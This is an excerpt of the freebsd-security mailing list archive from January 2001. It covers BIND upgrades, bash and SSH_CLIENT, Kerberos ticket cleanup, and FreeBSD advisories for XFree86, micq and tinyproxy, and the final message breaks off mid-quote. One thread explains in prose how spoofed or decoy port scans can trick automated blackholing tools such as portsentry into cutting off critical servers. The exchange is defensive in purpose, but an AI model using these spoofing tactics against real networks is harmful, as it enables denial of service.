rfx-216-196-73-168.users.reflexcom.com ([216.196.73.168]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Mon, 29 Jan 2001 22:57:22 -0800 Received: (from cjc@localhost) by rfx-216-196-73-168.users.reflexcom.com (8.11.1/8.11.1) id f0U6x6E06482; Mon, 29 Jan 2001 22:59:06 -0800 (PST) (envelope-from cjc) Date: Mon, 29 Jan 2001 22:59:05 -0800 From: "Crist J. Clark" To: Roger Marquis Cc: security@FreeBSD.ORG Subject: Re: bind8.2.3 and installation problem Message-ID: <20010129225905.F91447@rfx-216-196-73-168.users.reflex> Reply-To: cjclark@alum.mit.edu References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: ; from marquis@roble.com on Mon, Jan 29, 2001 at 09:32:18PM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Jan 29, 2001 at 09:32:18PM -0800, Roger Marquis wrote: > Mehmet Hinc wrote: > > Stop in /usr/ports/net/bind8. > > *** Error code 1 > > > > What ??????????? Why??????????? I updated my ports and tried to install > > bind8.2.3 because bind8.2.2 has had a vulnerability , so While I was > > installing it, I had a error msgs. (in the up) > > please let me know How can I fix it !!! > > Bind was written on BSD. What's the point of using a port to > upgrade it? All FreeBSD's bind port does is increase your chances > of errors, reduce your system's overall QA, and install duplicate > files in non-standard places. The following steps have worked > flawlessly over this and several bind upgrades: # cd /usr/ports/net/bind8 # make PREFIX=/usr install PREFIX rocks. -- Crist J. Clark cjclark@alum.mit.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 23:12:46 2001 Delivered-To: freebsd-security@freebsd.org Received: from ducky.nz.freebsd.org (ns1.unixathome.org [203.79.82.27]) by hub.freebsd.org (Postfix) with ESMTP id 5D51E37B49A for ; Mon, 29 Jan 2001 23:12:27 -0800 (PST) Received: from wocker (wocker.int.nz.freebsd.org [192.168.0.99]) by ducky.nz.freebsd.org (8.9.3/8.9.3) with ESMTP id UAA56104; Tue, 30 Jan 2001 20:12:22 +1300 (NZDT) Message-Id: <200101300712.UAA56104@ducky.nz.freebsd.org> From: "Dan Langille" Organization: The FreeBSD Diary / FreshPorts To: "Crist J. Clark" Date: Tue, 30 Jan 2001 20:12:21 +1300 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: bind8.2.3 and installation problem Reply-To: dan@langille.org Cc: security@FreeBSD.ORG In-reply-to: <20010129225905.F91447@rfx-216-196-73-168.users.reflex> References: ; from marquis@roble.com on Mon, Jan 29, 2001 at 09:32:18PM -0800 X-mailer: Pegasus Mail for Win32 (v3.12c) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 29 Jan 2001, at 22:59, Crist J. Clark wrote: > On Mon, Jan 29, 2001 at 09:32:18PM -0800, Roger Marquis wrote: > > Mehmet Hinc wrote: > > > Stop in /usr/ports/net/bind8. > > > *** Error code 1 > > > > > > What ??????????? Why??????????? I updated my ports and tried to install > > > bind8.2.3 because bind8.2.2 has had a vulnerability , so While I was > > > installing it, I had a error msgs. (in the up) > > > please let me know How can I fix it !!! > > > > Bind was written on BSD. What's the point of using a port to > > upgrade it? All FreeBSD's bind port does is increase your chances > > of errors, reduce your system's overall QA, and install duplicate > > files in non-standard places. The following steps have worked > > flawlessly over this and several bind upgrades: > > # cd /usr/ports/net/bind8 > # make PREFIX=/usr install > > PREFIX rocks. It can't be that simple! -- Dan Langille pgpkey - finger dan@unixathome.org | http://unixathome.org/finger.php To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 23:54:41 2001 Delivered-To: freebsd-security@freebsd.org Received: from imo-r14.mx.aol.com (imo-r14.mx.aol.com [152.163.225.68]) by hub.freebsd.org (Postfix) with ESMTP id 5E93537B4E0 for ; Mon, 29 Jan 2001 23:54:19 -0800 (PST) Received: from FBSDSecure@aol.com by imo-r14.mx.aol.com (mail_out_v29.5.) id n.36.115ac9de (16785) for ; Tue, 30 Jan 2001 02:54:10 -0500 (EST) From: FBSDSecure@aol.com Message-ID: <36.115ac9de.27a7cd22@aol.com> Date: Tue, 30 Jan 2001 02:54:10 EST Subject: Re: (no subject) To: freebsd-security@freebsd.org MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Mailer: AOL 5.0 for Windows sub 120 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In a message dated 1/28/01 2:29:59 AM Pacific Standard Time, kris@obsecurity.org writes: > > addresses are valid and which are not. So spoofing an IP address is pretty > > > close to impossible from a Dialup, xDSL, or cable modem. Another thing to > > > Wrong. If this were true, packet-flooding based denial of service > attacks would be almost impossible since they would be easily blocked > and traced. The sad fact of the matter is that the majority of > networks on the internet today, including ISPs do not implement egress > filtering. > > > point out though is if a hacker were to spoof his IP address and do a port > > > scan, what would be the point? The data is useless if it can't get back > to > > the individual. Besides, the portsentry package has a ignore file. > > You miss the point: the attacker won't get any information back out of > it, but if you have a fascist response to port scans which blackholes > all traffic coming from the IP address of the port scan, the attacker > can spoof the packets to come from a server which is critical to the > operation of your machine, such as your ISP's DNS servers, or mail > servers, which will cause your machine to blackhole them and thereby > shoot itself in the foot. At a lower level of annoyance, you can > blackhole popular websites like google which the user might use. > > The point is that automated active response is almost always a bad > idea, because it can be fooled into doing more harm than good. > > Kris > > Then why doesn't the ISPs use egress filtering? To me it would stop alot of the junk that is going on in the internet. Like I said, all critical IPs are placed in the ignore file. The DNS and email servers I did not consider, but they will be added. Thanks for the tip. Dan. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 0: 1:10 2001 Delivered-To: freebsd-security@freebsd.org Received: from imo-d07.mx.aol.com (imo-d07.mx.aol.com [205.188.157.39]) by hub.freebsd.org (Postfix) with ESMTP id EC65037B4EC for ; Tue, 30 Jan 2001 00:00:47 -0800 (PST) Received: from FBSDSecure@aol.com by imo-d07.mx.aol.com (mail_out_v29.5.) id n.3c.6c030f5 (16785) for ; Tue, 30 Jan 2001 03:00:42 -0500 (EST) From: FBSDSecure@aol.com Message-ID: <3c.6c030f5.27a7ceaa@aol.com> Date: Tue, 30 Jan 2001 03:00:42 EST Subject: Re: (no subject) To: freebsd-security@freebsd.org MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Mailer: AOL 5.0 for Windows sub 120 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In a message dated 1/28/01 12:43:34 PM Pacific Standard Time, root@noops.org writes: > > On Sun, 28 Jan 2001, Chris wrote: > > > > Another thing to point out though is if a hacker were to spoof his IP > address > > > > and do a port scan, what would be the point? The data is useless if > it can't > > > > get back to the individual. > > > > > > One word, DoS. > > Well, two words... one of which is DoS. Another, which I find fun, and > also doesn't matter if your ISP does egress filtering is to make a scan > look like it came from your whole subnet. I'm sure that even if my DSL > provider was making sure all the leaving traffic came from it's network it > would still be tough to catch. Or, and this is rare these days, is if you > are on an unswitched subnet or could somehow view traffic in flight you > can always make the scan look like it came from the guy next door and just > sniff the replies as them come back. > > I know my DSL is unfiltered on it's way out, so if I'm doing an audit from > home for any reason I always mix in 127.0.0.1 as a decoy -- just in case > it hits something amusingly misconfigured, like a portsentry-type package > with a glaring misconfiguration. > > -tcannon > That's why 127.0.0.1 is in the ignore file. Reminds me of an phrase I heard somewhere...One false packet and I'll knock you off the net....Or something like that. Dan. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 0:36:56 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.189]) by hub.freebsd.org (Postfix) with SMTP id 1EEB037B698 for ; Tue, 30 Jan 2001 00:36:10 -0800 (PST) Received: (qmail 2054 invoked by uid 1000); 30 Jan 2001 08:34:17 -0000 Date: Tue, 30 Jan 2001 10:34:16 +0200 From: Peter Pentchev To: Patrick Bihan-Faou Cc: freebsd-hackers@freebsd.org, freebsd-security@freebsd.org Subject: Re: Bash2 removes SSH_CLIENT from the environment Message-ID: <20010130103415.B328@ringworld.oblivion.bg> Mail-Followup-To: Patrick Bihan-Faou , freebsd-hackers@freebsd.org, freebsd-security@freebsd.org References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from patrick@netzuno.com on Mon, Jan 29, 2001 at 03:09:30PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Jan 29, 2001 at 03:09:30PM -0500, Patrick Bihan-Faou wrote: > Hi, > > I am writing some script that looks for the SSH_CLIENT environment variable. > As specified in the sshd(8) man page, this variable should contain the IP > address of the client, the port number on the client side and the port > number on the server side. > > However I found that if the login shell of the user is set to bash (version > 2.03 or 2.04 at least), this variable is never set. Upon inspection of the > code for bash, it appears that bash is explicitely removing the definition > of this environment variable. Would anybody have an idea why ??? > > Also the fix to leave SSH_CLIENT defined is trivial, is that something that > would be desirable for the bash2 port ? Huh? [roam@ringworld:v2 ~]$ ssh roam@localhost '/bin/echo "shell is $BASH_VERSION, SSH_CLIENT is $SSH_CLIENT"' roam@localhost.office1's password: shell is 2.04.0(1)-release, SSH_CLIENT is 127.0.0.1 1075 22 [roam@ringworld:v2 ~]$ This is on 4.2-stable with bash installed from the shells/bash2 port. Are you sure you don't have anything in your profiles that unsets unknown variables or something? G'luck, Peter -- .siht ekil ti gnidaer eb d'uoy ,werbeH ni erew ecnetnes siht fI To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 1:10:25 2001 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7327637B4EC; Tue, 30 Jan 2001 01:09:52 -0800 (PST) Received: (from kris@localhost) by freefall.freebsd.org (8.11.1/8.11.1) id f0U99qv87528; Tue, 30 Jan 2001 01:09:52 -0800 (PST) (envelope-from security-advisories@FreeBSD.org) Date: Tue, 30 Jan 2001 01:09:52 -0800 (PST) Message-Id: <200101300909.f0U99qv87528@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: kris set sender to security-advisories@FreeBSD.org using -f From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Ports Security Advisory: FreeBSD-SA-01:07.xfree86 Reply-To: security-advisories@FreeBSD.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-01:07 Security Advisory FreeBSD, Inc. Topic: Multiple XFree86 3.3.6 vulnerabilities Category: ports Module: XFree86-3.3.6, XFree86-aoutlibs Announced: 2001-01-23 Credits: Chris Evans Michal Zalewski Affects: Ports collection prior to the correction date. Corrected: 2000-10-24 (XFree86-3.3.6) Vendor status: Fixed in XFree86 4.0.1, no patches released by vendor. FreeBSD only: NO I. Background XFree86 is a popular X server. It exists in three versions in the FreeBSD ports collection: 3.3.6 and 4.0.2, as well as a.out libraries based on XFree86 3.3.3. II. Problem Description The XFree86-3.3.6 port, versions prior to 3.3.6_1, has multiple vulnerabilities that may allow local or remote users to cause a denial of service attack against a vulnerable X server. Additionally, local users may be able to obtain elevated privileges under certain circumstances. X server DoS: Remote users can, by sending a malformed packet to port 6000 TCP, cause the victim's X server to freeze for several minutes. During the freeze, the mouse does not move and the screen does not update in any way. In addition, the keyboard is unresponsive, including console-switch and kill-server key combinations. Non-X processes, such as remote command-line logins and non-X applications, are unaffected by the freeze. Xlib holes: Due to various coding flaws in libX11, privileged (setuid/setgid) programs linked against libX11 may allow local users to obtain elevated privileges. libICE DoS: Due to inadequate bounds checking in libICE, a denial of service exists with any application using libICE to listen on a network port for network services. The XFree86-aoutlibs port contains the XFree86 libraries from the 3.3.3 release of XFree86, in a.out format suitable for use with applications in the legacy a.out binaryformat, most notably being the FreeBSD native version of Netscape. It is unknown whether Netscape is vulnerable to the problems described in this advisory, but it believed that the only potential vulnerability is the libICE denial-of-service condition described above. The XFree86 and XFree86-aoutlibs ports are not installed by default (although XFree86 is available as an installation option in the FreeBSD installer), nor are they "part of FreeBSD" as such: they are part of the FreeBSD ports collection, which contains almost 4500 third-party applications in a ready-to-install format. The ports collections shipped with FreeBSD 3.5.1 and 4.1.1 contain these problem since they were discovered after the releases, but the XFree86 problem was corrected prior to the release of FreeBSD 4.2. At the time of advisory release, the XFree86-aoutlibs port has not been corrected. FreeBSD makes no claim about the security of these third-party applications, although an effort is underway to provide a security audit of the most security-critical ports. III. Impact Local or remote users may cause a denial of service attack against an X server or certain X applications. Local users may obtain elevated privileges with certain X applications. If you have not chosen to install the XFree86 3.3.6 port/package or the XFree86-aoutlibs port/package, or you are running XFree86 4.0.1 or later, then your system is not vulnerable to this problem. IV. Workaround Deinstall the XFree86-3.3.6 and XFree86-aoutlibs ports/packages, if you you have installed them. Note that any statically linked binaries which make use of the vulnerable XFree86 routines may still be vulnerable to the problems after deinstallation of the port/package. However due to the difficulty of developing a reliable scanning utility for such binaries no such utility is provided. V. Solution One of the following: 1) Upgrade your entire ports collection and rebuild the XFree86-3.3.6 port. 2) Deinstall the old package and install an XFree86-4.0.2 package obtained from: [i386] ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/x11/XFree86-4.0.2_5.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/x11/XFree86-4.0.2_5.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/x11/XFree86-4.0.2_5.tgz [alpha] Packages are not automatically generated for the alpha architecture at this time due to lack of build resources. NOTE: XFree86-3.3.6 packages are no longer made available, only the newer XFree86-4.0.2 packages. Note also that the XFree86-aoutlibs port has not yet been fixed: there is currently no solution to the problem other than removing the port/package and recompiling any dependent software to use ELF libraries, or switching to an ELF-based version of the software, if available (e.g. the BSD/OS or Linux versions of Netscape, as an alternative to the FreeBSD native version). The potential impact of the vulnerabilities to the local environment may be deemed not sufficiently great to warrant this approach, however. 3) download a new port skeleton for the XFree86-3.3.6 port from: http://www.freebsd.org/ports/ and use it to rebuild the port. 4) Use the portcheckout utility to automate option (3) above. The portcheckout port is available in /usr/ports/devel/portcheckout or the package can be obtained from: ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/devel/portcheckout-2.0.tgz -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iQCVAwUBOm3xpFUuHi5z0oilAQF+zQQAiwIQSv6MemATgo6v2/QwMjttGpbMxbh2 s94CK+aAlbtRlsrBZl6DIWwVydc1C3k6EHnM+NHqwhfOq/yrwp7JDKwVUmvi+5Qx 1UAY8QRu45OednLsyT2qUuNrowjMmkdB0EcsqQq2UvLtN2054m6AmpZk1t3TjGTr CCOFX30qIn0= =pI+q -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 1:15:23 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.org (adsl-64-169-104-72.dsl.lsan03.pacbell.net [64.169.104.72]) by hub.freebsd.org (Postfix) with ESMTP id 4A2EB37B6A2 for ; Tue, 30 Jan 2001 01:15:03 -0800 (PST) Received: by obsecurity.org (Postfix, from userid 1000) id 7EA9FBA2B4; Tue, 30 Jan 2001 01:15:33 -0800 (PST) Date: Tue, 30 Jan 2001 01:15:33 -0800 From: Kris Kennaway To: FBSDSecure@aol.com Cc: freebsd-security@FreeBSD.ORG Subject: Re: (no subject) Message-ID: <20010130011533.A43910@xor.obsecurity.org> References: <36.115ac9de.27a7cd22@aol.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="pWyiEgJYm5f9v55/" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <36.115ac9de.27a7cd22@aol.com>; from FBSDSecure@aol.com on Tue, Jan 30, 2001 at 02:54:10AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --pWyiEgJYm5f9v55/ Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Tue, Jan 30, 2001 at 02:54:10AM -0500, FBSDSecure@aol.com wrote: > Then why doesn't the ISPs use egress filtering? To me it would stop > alot of the junk that is going on in the internet. Like I said, all > critical IPs are placed in the ignore file. The DNS and email > servers I did not consider, but they will be added. Thanks for the > tip. "It's too difficult", etc. Kris --pWyiEgJYm5f9v55/ Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6doY1Wry0BWjoQKURArbDAJ91xuPFqDorzUVZqynLXIBLNUc6vgCfWM2Z YxtEC1zpMPIHcaIOEyXp53w= =VXrk -----END PGP SIGNATURE----- --pWyiEgJYm5f9v55/-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 1:15:30 2001 Delivered-To: freebsd-security@freebsd.org Received: from lists01.iafrica.com (lists01.iafrica.com [196.7.0.141]) by hub.freebsd.org (Postfix) with ESMTP id 7A9F637B6A1 for ; Tue, 30 Jan 2001 01:15:09 -0800 (PST) Received: from nwl.fw.uunet.co.za ([196.31.2.162]) by lists01.iafrica.com with esmtp (Exim 3.12 #2) id 14NWa7-0006PU-01; Tue, 30 Jan 2001 10:56:07 +0200 Received: (from nobody@localhost) by nwl.fw.uunet.co.za (8.8.8/8.6.9) id KAA16857; Tue, 30 Jan 2001 10:18:37 +0200 (SAST) Received: by nwl.fw.uunet.co.za via recvmail id 16731; Tue Jan 30 10:18:30 2001 Received: from sheldonh (helo=axl.fw.uunet.co.za) by axl.fw.uunet.co.za with local-esmtp (Exim 3.20 #1) id 14NVzi-0000sd-00; Tue, 30 Jan 2001 10:18:30 +0200 From: Sheldon Hearn To: "Jacques A. Vidrine" Cc: freebsd-security@freebsd.org Subject: Re: cvs commit: src/usr.bin/login login.c In-reply-to: Your message of "Tue, 23 Jan 2001 15:48:29 CST." <20010123154829.A74738@hamlet.nectar.com> Date: Tue, 30 Jan 2001 10:18:30 +0200 Message-ID: <3386.980842710@axl.fw.uunet.co.za> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 23 Jan 2001 15:48:29 CST, "Jacques A. Vidrine" wrote: > This gets you to the point that if you carefully [1] configure PAM, and > you log in using pam_krb5, you will have tickets. As per the pam_krb5 > documentation, you have to destroy them yourself with `kdestroy'. I find this cron job useful: # Destroy all stale Kerberos5 tickets # for i in `find /tmp -name 'krb5cc_*' -ctime +1 -print` ; do rm -f $i done Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 1:25:34 2001 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 5CAA937B4F8; Tue, 30 Jan 2001 01:25:01 -0800 (PST) Received: (from kris@localhost) by freefall.freebsd.org (8.11.1/8.11.1) id f0U9P1C89113; Tue, 30 Jan 2001 01:25:01 -0800 (PST) (envelope-from security-advisories@FreeBSD.org) Date: Tue, 30 Jan 2001 01:25:01 -0800 (PST) Message-Id: <200101300925.f0U9P1C89113@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: kris set sender to security-advisories@FreeBSD.org using -f From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Ports Security Advisory: FreeBSD-SA-01:14.micq Reply-To: security-advisories@FreeBSD.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-01:14 Security Advisory FreeBSD, Inc. Topic: micq remote buffer overflow vulnerability Category: ports Module: micq Announced: 2001-01-29 Credits: recidjvo@pkcrew.org Affects: Ports collection prior to the correction date. Corrected: 2001-01-24 Vendor status: Updated version released FreeBSD only: NO I. Background micq is a text-based ICQ client. II. Problem Description The micq port, versions prior to 0.4.6.1, contains a remote vulnerability: due to a buffer overflow, a malicious remote user sending specially-crafted packets may be able to execute arbitrary code on the local system with the privileges of the micq process. To accomplish this, the attacker must be able to sniff the packets between the micq client and ICQ server in order to gain the session key to cause the client to accept the malicious packets. The micq port is not installed by default, nor is it "part of FreeBSD" as such: it is part of the FreeBSD ports collection, which contains over 4500 third-party applications in a ready-to-install format. The ports collections shipped with FreeBSD 3.5.1 and 4.2 contain this problem since it was discovered after the releases. FreeBSD makes no claim about the security of these third-party applications, although an effort is underway to provide a security audit of the most security-critical ports. III. Impact Malicious remote users may cause arbitrary code to be executed with the privileges of the micq process. If you have not chosen to install the micq port/package, then your system is not vulnerable to this problem. IV. Workaround Deinstall the micq port/package, if you have installed it. V. Solution One of the following: 1) Upgrade your entire ports collection and rebuild the micq port. 2) Deinstall the old package and install a new package dated after the correction date, obtained from: [i386] ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/net/micq-0.4.6.1.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/net/micq-0.4.6.1.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/net/micq-0.4.6.1.tgz [alpha] Packages are not automatically generated for the alpha architecture at this time due to lack of build resources. 3) download a new port skeleton for the micq port from: http://www.freebsd.org/ports/ and use it to rebuild the port. 4) Use the portcheckout utility to automate option (3) above. The portcheckout port is available in /usr/ports/devel/portcheckout or the package can be obtained from: ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/devel/portcheckout-2.0.tgz -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iQCVAwUBOnXfalUuHi5z0oilAQEhPQP/aq4wwNE4IFedgd2Fz8IEZo+cfiu5dsPa P1fNoylanm+TbLBEV+hJwjt5lBQHQoEmMh3efz2x7foj42QMP6YPtw6WPcwbXtVQ uTSra4+3Ck2NdO+5WDju2X0kMbIBWJMCAPrGEpr/EkNbJRu76Ojp6Cw31WBx17X7 BwLriuu9c9I= =Iluh -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 1:26:21 2001 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 505AD37B4E0; Tue, 30 Jan 2001 01:25:26 -0800 (PST) Received: (from kris@localhost) by freefall.freebsd.org (8.11.1/8.11.1) id f0U9POS89150; Tue, 30 Jan 2001 01:25:24 -0800 (PST) (envelope-from security-advisories@FreeBSD.org) Date: Tue, 30 Jan 2001 01:25:24 -0800 (PST) Message-Id: <200101300925.f0U9POS89150@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: kris set sender to security-advisories@FreeBSD.org using -f From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Ports Security Advisory: FreeBSD-SA-01:15.tinyproxy Reply-To: security-advisories@FreeBSD.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-01:15 Security Advisory FreeBSD, Inc. Topic: tinyproxy contains remote vulnerabilities Category: ports Module: tinyproxy Announced: 2001-01-29 Credits: |CyRaX| Affects: Ports collection prior to the correction date. Corrected: 2001-01-22 Vendor status: Updated version released FreeBSD only: NO I. Background tinyproxy is a lightweight http proxy. II. Problem Description The tinyproxy port, versions prior to 1.3.3a, contains remote vulnerabilities: due to a heap overflow, malicious remote users can cause a denial-of-service by crashing the proxy. Additionally, the attacker may potentially cause arbitrary code to be executed as the user running tinyproxy. The tinyproxy port is not installed by default, nor is it "part of FreeBSD" as such: it is part of the FreeBSD ports collection, which contains over 4500 third-party applications in a ready-to-install format. The ports collections shipped with FreeBSD 3.5.1 and 4.2 contain this problem since it was discovered after the releases. FreeBSD makes no claim about the security of these third-party applications, although an effort is underway to provide a security audit of the most security-critical ports. III. Impact Malicious remote users may cause a denial-of-service and potentially cause arbitrary code to be executed. If you have not chosen to install the tinyproxy port/package, then your system is not vulnerable to this problem. IV. Workaround Deinstall the tinyproxy port/package, if you have installed it. V. Solution One of the following: 1) Upgrade your entire ports collection and rebuild the tinyproxy port. 2) Deinstall the old package and install a new package dated after the correction date, obtained from: [i386] ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/www/tinyproxy-1.3.3a.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/www/tinyproxy-1.3.3a.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/www/tinyproxy-1.3.3a.tgz [alpha] Packages are not automatically generated for the alpha architecture at this time due to lack of build resources. 3) download a new port skeleton for the tinyproxy port from: http://www.freebsd.org/ports/ and use it to rebuild the port. 4) Use the portcheckout utility to automate option (3) above. The portcheckout port is available in /usr/ports/devel/portcheckout or the package can be obtained from: ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/devel/portcheckout-2.0.tgz -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iQCVAwUBOnXgJ1UuHi5z0oilAQHo6wQAj3xyGIyobs/grdxqowjFMcpE86ZxuguC /FzN9pNGbj2/tRv+5XWALJs4dl5mfqNruxeNlFy7uNZAoLztRd5DxuPa/KLJBh3R NYUFjCBzBbjMDZzSOQSpRWwMrs8o/y5qWgAEdVQXqTmXPrKKnbiIBpAYRX/9pzGW s199naiw8yM= =M4Q1 -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 1:27:27 2001 Delivered-To: freebsd-security@freebsd.org Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id 5CEB337B6A2 for ; Tue, 30 Jan 2001 01:26:38 -0800 (PST) Received: from rfx-216-196-73-168.users.reflexcom.com ([216.196.73.168]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Tue, 30 Jan 2001 01:24:33 -0800 Received: (from cjc@localhost) by rfx-216-196-73-168.users.reflexcom.com (8.11.1/8.11.1) id f0U9QLW07541; Tue, 30 Jan 2001 01:26:21 -0800 (PST) (envelope-from cjc) Date: Tue, 30 Jan 2001 01:26:16 -0800 From: "Crist J. Clark" To: Dan Langille Cc: security@FreeBSD.ORG Subject: Re: bind8.2.3 and installation problem Message-ID: <20010130012616.J91447@rfx-216-196-73-168.users.reflex> Reply-To: cjclark@alum.mit.edu References: ; <20010129225905.F91447@rfx-216-196-73-168.users.reflex> <200101300712.UAA56104@ducky.nz.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <200101300712.UAA56104@ducky.nz.freebsd.org>; from dan@langille.org on Tue, Jan 30, 2001 at 08:12:21PM +1300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Jan 30, 2001 at 08:12:21PM +1300, Dan Langille wrote: > On 29 Jan 2001, at 22:59, Crist J. Clark wrote: > > > On Mon, Jan 29, 2001 at 09:32:18PM -0800, Roger Marquis wrote: > > > Mehmet Hinc wrote: > > > > Stop in /usr/ports/net/bind8. > 